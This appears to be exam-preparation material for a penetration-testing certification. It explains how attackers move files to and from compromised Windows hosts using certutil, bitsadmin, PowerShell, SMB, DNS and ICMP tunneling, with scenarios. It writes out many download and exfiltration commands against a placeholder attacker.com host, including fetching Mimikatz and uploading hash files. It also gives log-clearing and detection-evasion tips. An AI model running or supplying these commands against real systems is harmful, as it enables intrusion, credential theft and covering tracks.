Post-Exploitation File Transfer Techniques

Post-exploitation file transfer refers to the methods an attacker uses to copy files to or from a compromised host after initial access has been established. This is distinct from the initial exploit delivery (e.g., phishing payload) because the attacker now has a foothold and needs to bring in additional tools (e.g., privilege escalation scripts, password dumpers) or exfiltrate data (e.g., hashes, documents). The challenge is that the compromised host may have restrictive outbound firewall rules, application allowlisting (AppLocker, WDAC), or network monitoring that blocks obvious transfers. The attacker must use built-in OS utilities that are often allowed by default, or abuse legitimate protocols like HTTP, HTTPS, SMB, DNS, or ICMP.

Using built-in tools reduces the chance of detection because they are signed by Microsoft, run from trusted locations (e.g., C:\Windows\System32), and often generate logs that blend in with normal admin activity. Examples include: - certutil.exe: A command-line tool for managing certificates, but it can also base64-encode/decode files and download content via HTTP/HTTPS. - bitsadmin.exe: Manages Background Intelligent Transfer Service (BITS) jobs; can download/upload files over HTTP/HTTPS. - PowerShell: With cmdlets like Invoke-WebRequest, Invoke-RestMethod, Start-BitsTransfer, or System.Net.WebClient. - cscript/wscript: Can run VBScript or JScript that uses XMLHTTP or ADODB.Stream objects. - ftp.exe: Native FTP client, though often blocked. - net use + copy: Uses SMB to copy files from a network share; requires outbound SMB (port 445) which may be blocked. - scp/pscp: If SSH is installed (e.g., Windows 10/11 with OpenSSH client).

certutil -urlcache -f http://attacker.com/payload.exe payload.exe downloads a file and caches it. The -f flag forces a fresh download. The tool uses WinHTTP, not WinINet, so it respects system proxy settings. It can also base64-encode a file: certutil -encode inputfile output.b64 and decode: certutil -decode input.b64 output.exe. On the exam, remember that certutil is often used to bypass proxy restrictions because it can use WinHTTP.

bitsadmin /transfer jobname /download /priority high http://attacker.com/tool.exe C:\temp\tool.exe creates a BITS job that downloads the file. BITS is designed to use idle network bandwidth and can resume interrupted transfers. It uses HTTP/HTTPS and is commonly allowed through firewalls because it uses the same ports as web browsing. BITS jobs are visible in the BITSAdmin console or PowerShell Get-BitsTransfer. The exam may test that BITS is slower than direct downloads but more stealthy.

PowerShell offers multiple ways to transfer files: - WebClient: (New-Object System.Net.WebClient).DownloadFile('http://attacker.com/payload.exe', 'C:\temp\payload.exe') - Invoke-WebRequest: Invoke-WebRequest -Uri http://attacker.com/payload.exe -OutFile C:\temp\payload.exe (alias: iwr) - Invoke-RestMethod: For REST APIs, but can download files. - Start-BitsTransfer: PowerShell wrapper for BITS: Start-BitsTransfer -Source http://attacker.com/payload.exe -Destination C:\temp\payload.exe - Net.WebClient.UploadFile: For exfiltration: (New-Object System.Net.WebClient).UploadFile('http://attacker.com/upload', 'C:\secrets\hashes.txt')

PowerShell logging (ScriptBlock, Module, Transcription) can reveal these commands. Attackers often obfuscate the payload or use reflection to avoid logging.

If the attacker has credentials or a pass-the-hash token, they can mount a remote share: net use Z: \\attacker\share password /user:domain\user then copy file Z:\. This requires outbound SMB (TCP 445) which is often blocked at the perimeter. However, inside the same network, SMB is commonly allowed. The exam may ask about using copy or robocopy over SMB.

When all else fails, attackers can encode data in DNS queries. Tools like dnscat2 or custom scripts send data as subdomain labels: data.attacker.com. The DNS server logs the query, and the attacker captures it. This is slow but very hard to block because DNS is essential. The exam expects you to know that DNS exfiltration uses TXT or A record queries.

ICMP echo requests (ping) can carry data in the payload field. Tools like icmpsh or nping embed data in ICMP packets. Many networks allow ICMP, but deep packet inspection can detect anomalies. The exam may test that ICMP exfiltration is limited by packet size (typically 56-64 bytes of payload).

Tools like Tunna or Chisel create a tunnel over HTTP/HTTPS to forward traffic. The attacker sets up a server that accepts HTTP requests, and the client on the compromised host makes outbound connections to it. Data is encapsulated in HTTP headers or body. This mimics normal web traffic.

Before transfer, files are often compressed (e.g., with Compress-Archive or tar) and encoded (base64) to reduce size and avoid binary content detection. Base64 increases size by ~33%, but it ensures safe transmission over text-based protocols.

Modern EDR solutions monitor for suspicious use of certutil, bitsadmin, and PowerShell. Attackers may rename executables, use alternate data streams, or load tools directly into memory (e.g., PowerShell reflection). The exam may ask about using cscript with an XMLHTTP object to download a file because it is less monitored than PowerShell.

Outbound HTTP/HTTPS (ports 80, 443) are almost always allowed. Some corporate proxies require authentication; tools that use WinHTTP (certutil, bitsadmin) can use the system proxy settings, while .NET-based tools (PowerShell WebClient) may require explicit proxy configuration. The exam may test that bitsadmin uses the system proxy by default.

Blue teams can detect these transfers by:

As a pentester, you must know how to clear or minimize logs: using wevtutil to clear event logs, or running commands in memory only.

After exploiting a remote code execution vulnerability on a Windows server, the attacker needs to run Mimikatz. The server has outbound HTTPS allowed but blocks SMB. The attacker uses:

certutil -urlcache -f https://attacker.com/mimikatz.exe C:\temp\mimikatz.exe

Then executes it. The download appears as a certificate cache operation in logs, which may not raise immediate alarms.

Post-exploitation file transfer is a critical skill. The PT0-002 exam will test your ability to select the appropriate tool for a given scenario, recognize common pitfalls, and understand how each tool interacts with network defenses. Practice these commands in a lab environment to solidify your understanding.

During an internal penetration test at a bank, the tester gains access to a Windows file server via a phishing campaign. The server is heavily locked down: outbound SMB is blocked, PowerShell is restricted via AppLocker, and only HTTP/HTTPS traffic through a proxy is allowed. The tester needs to upload a privilege escalation tool. Using certutil -urlcache -f https://attacker.com/beacon.exe C:\temp\beacon.exe works because certutil is allowed by AppLocker (signed by Microsoft) and uses WinHTTP, which automatically authenticates to the corporate proxy. The download completes, but the tester notices that the proxy logs show a connection to a suspicious domain. To avoid detection, the tester later switches to using BITS with a legitimate-looking URL (e.g., a CDN) and schedules the transfer during off-peak hours. This scenario highlights the need to blend in with normal traffic and understand proxy behavior.

In a red team exercise for a government agency, the team compromises a workstation on a classified network that has strict egress filtering — only DNS and ICMP are allowed outbound. The team needs to exfiltrate a 10 MB database file. Using DNS tunneling, they split the file into chunks, base64-encode them, and send each chunk as a subdomain query to their own DNS server. The process takes hours due to rate limiting and query size limits (255 bytes per label, 64 KB per TXT record). They use a tool like dnscat2 to handle reassembly. This is slow but undetected by the firewall. The team also uses ICMP tunneling for small command output. This scenario demonstrates the importance of alternative protocols when standard ones are blocked.

During a penetration test of a large e-commerce company, the tester compromises a web server and wants to move laterally to a database server. Both servers are on the same internal network with no firewall between them. SMB is open. The tester uses net use \\dbserver\admin$ /user:localadmin 'password' then copy mimikatz.exe \\dbserver\admin$\temp\. This is fast and reliable. However, the tester must ensure the account used has admin rights on the target. This scenario shows that when network controls are absent, simple file sharing over SMB is efficient.